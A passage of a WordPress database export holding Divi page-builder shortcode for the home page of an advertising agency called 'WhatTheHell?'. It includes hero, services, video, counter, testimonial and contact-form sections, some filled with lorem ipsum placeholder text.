align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 21:04:19','2020-07-06 21:04:19','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(265,1,'2020-07-06 21:25:22','2020-07-06 21:25:22','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager 